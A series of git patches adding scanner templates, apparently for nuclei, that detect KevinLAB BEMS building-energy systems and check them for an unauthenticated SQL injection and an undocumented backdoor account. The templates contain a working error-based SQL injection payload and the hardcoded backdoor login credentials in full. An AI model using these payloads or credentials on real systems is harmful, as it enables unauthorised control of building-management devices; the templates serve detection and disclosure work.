From 89edd83f1d501fc10ea77b2adcc8c76ef022d0ab Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 22 Jul 2021 20:46:53 +0900 Subject: [PATCH 01/10] Update favicon-detection.yaml Signed-off-by: GwanYeong Kim --- technologies/favicon-detection.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 1110dbd233..5add1359b3 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -2036,3 +2036,7 @@ requests: name: "SpamSniper" dsl: - "status_code==200 && (\"-1000719429\" == mmh3(base64_py(body)))" + - type: dsl + name: "KevinLAB" + dsl: + - "status_code==200 && (\"-1650202746\" == mmh3(base64_py(body)))" From 1005b0b23b7d356fce5ac069ae63b66edea406e5 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 22 Jul 2021 20:47:23 +0900 Subject: [PATCH 02/10] Create kevinlab-device-detect.yaml Signed-off-by: GwanYeong Kim --- iot/kevinlab-device-detect.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 iot/kevinlab-device-detect.yaml diff --git a/iot/kevinlab-device-detect.yaml b/iot/kevinlab-device-detect.yaml new file mode 100644 index 0000000000..8e28c8b5ba --- /dev/null +++ b/iot/kevinlab-device-detect.yaml @@ -0,0 +1,30 @@ +id: kevinlab-device-detect + +info: + name: KevinLAB Deviceas Detection + description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. + author: gy741 + severity: info + tags: iot + +requests: + - method: GET + path: + - "{{BaseURL}}/pages/" + - "{{BaseURL}}/dashboard/" + + matchers-condition: or + matchers: + - type: word + words: + - 'BEMS' + - '../http/index.php' + part: body + condition: and + + - type: word + words: + - 'HEMS' + - '../dashboard/proc.php' + part: body + condition: and From a4ec6a2b1117f157e404ab89fb801007286729c0 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 22 Jul 2021 21:46:18 +0900 Subject: [PATCH 03/10] Create kevinlab-bems-sqli.yaml The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries. Signed-off-by: GwanYeong Kim --- vulnerabilities/other/kevinlab-bems-sqli.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/other/kevinlab-bems-sqli.yaml diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml new file mode 100644 index 0000000000..8d345dfd23 --- /dev/null +++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -0,0 +1,28 @@ +id: kevinlab-bems-sqli + +info: + name: KevinLAB BEMS (Building Energy Management System) Unauthenticated SQL Injection + author: gy741 + severity: high + description: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php + tags: kevinlab,sqli + +requests: + - raw: + - | + POST /http/index.php HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Accept-Encoding: gzip, deflate + Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close + + requester=login&request=login¶ms=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] + + matchers: + - type: word + words: + - "XPATH syntax error" From 69db0862ee688475299805dfeb7fe1907a5b8a7a Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 22 Jul 2021 22:13:00 +0900 Subject: [PATCH 04/10] Create kevinlab-bems-backdoor.yaml The BEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. Signed-off-by: GwanYeong Kim --- .../other/kevinlab-bems-backdoor.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 vulnerabilities/other/kevinlab-bems-backdoor.yaml diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml new file mode 100644 index 0000000000..8256687c57 --- /dev/null +++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml @@ -0,0 +1,36 @@ +id: kevinlab-bems-backdoor + +info: + name: KevinLAB BEMS (Building Energy Management System) Undocumented Backdoor Account + author: gy741 + severity: critical + description: The BEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php + tags: kevinlab + +requests: + - raw: + - | + POST /http/index.php HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Accept-Encoding: gzip, deflate + Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close + + requester=login&request=login¶ms=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D + + matchers-condition: and + matchers: + - type: regex + regex: + - 'data":"[A-Za-z0-9-]+' + - 'login_key":"[A-Za-z0-9-]+' + part: body + condition: or + + - type: status + status: + - 200 From 47ea40bc5513be6e44abe1f71f2fb6b516740c1e Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 24 Jul 2021 03:17:53 +0530 Subject: [PATCH 05/10] Update kevinlab-bems-backdoor.yaml --- vulnerabilities/other/kevinlab-bems-backdoor.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml index 8256687c57..e2abcec244 100644 --- a/vulnerabilities/other/kevinlab-bems-backdoor.yaml +++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml @@ -21,7 +21,7 @@ requests: Connection: close requester=login&request=login¶ms=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D - + matchers-condition: and matchers: - type: regex From 406dee74e87a15973e5cffe4536df2cbb5411b1c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 11:42:39 +0530 Subject: [PATCH 06/10] Update kevinlab-device-detect.yaml --- iot/kevinlab-device-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/iot/kevinlab-device-detect.yaml b/iot/kevinlab-device-detect.yaml index 8e28c8b5ba..2f33447a4c 100644 --- a/iot/kevinlab-device-detect.yaml +++ b/iot/kevinlab-device-detect.yaml @@ -1,7 +1,7 @@ id: kevinlab-device-detect info: - name: KevinLAB Deviceas Detection + name: KevinLAB Devices Detection description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. author: gy741 severity: info From 87b4c2e98b4bdc44837fff077866a5ab86f96ea7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 11:47:05 +0530 Subject: [PATCH 07/10] Update kevinlab-bems-sqli.yaml --- vulnerabilities/other/kevinlab-bems-sqli.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml index 8d345dfd23..781f8eb9a3 100644 --- a/vulnerabilities/other/kevinlab-bems-sqli.yaml +++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -1,11 +1,14 @@ id: kevinlab-bems-sqli info: - name: KevinLAB BEMS (Building Energy Management System) Unauthenticated SQL Injection + name: KevinLAB BEMS 1.0 Unauthenticated SQL Injection/Authentication Bypass author: gy741 severity: high description: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php + reference: | + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php + - https://www.exploit-db.com/exploits/50146 + - https://packetstormsecurity.com/files/163572/ tags: kevinlab,sqli requests: From 9a46592f714d5fed6424931de12da048334e8865 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 11:59:35 +0530 Subject: [PATCH 08/10] Update kevinlab-bems-sqli.yaml --- vulnerabilities/other/kevinlab-bems-sqli.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml index 781f8eb9a3..e4a4a8fcc4 100644 --- a/vulnerabilities/other/kevinlab-bems-sqli.yaml +++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -25,7 +25,12 @@ requests: requester=login&request=login¶ms=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] + matchers-condition: and matchers: - type: word words: - "XPATH syntax error" + - ": '\\ZSL1ZSL'" + - type: status + status: + - 200 From 2631f55550f1d7e37d1b89b23d8eecdffb905ba8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 12:07:27 +0530 Subject: [PATCH 09/10] Update kevinlab-bems-backdoor.yaml --- vulnerabilities/other/kevinlab-bems-backdoor.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml index e2abcec244..54619b0ce4 100644 --- a/vulnerabilities/other/kevinlab-bems-backdoor.yaml +++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml @@ -31,6 +31,11 @@ requests: part: body condition: or + - type: word + words: + - '"result":true' + part: body + - type: status status: - 200 From ac45802ef5fce60fa719eadcaf6fedd30d2307f0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 12:10:46 +0530 Subject: [PATCH 10/10] Update kevinlab-bems-sqli.yaml --- vulnerabilities/other/kevinlab-bems-sqli.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml index e4a4a8fcc4..6d35885dfc 100644 --- a/vulnerabilities/other/kevinlab-bems-sqli.yaml +++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -31,6 +31,7 @@ requests: words: - "XPATH syntax error" - ": '\\ZSL1ZSL'" + condition: and - type: status status: - 200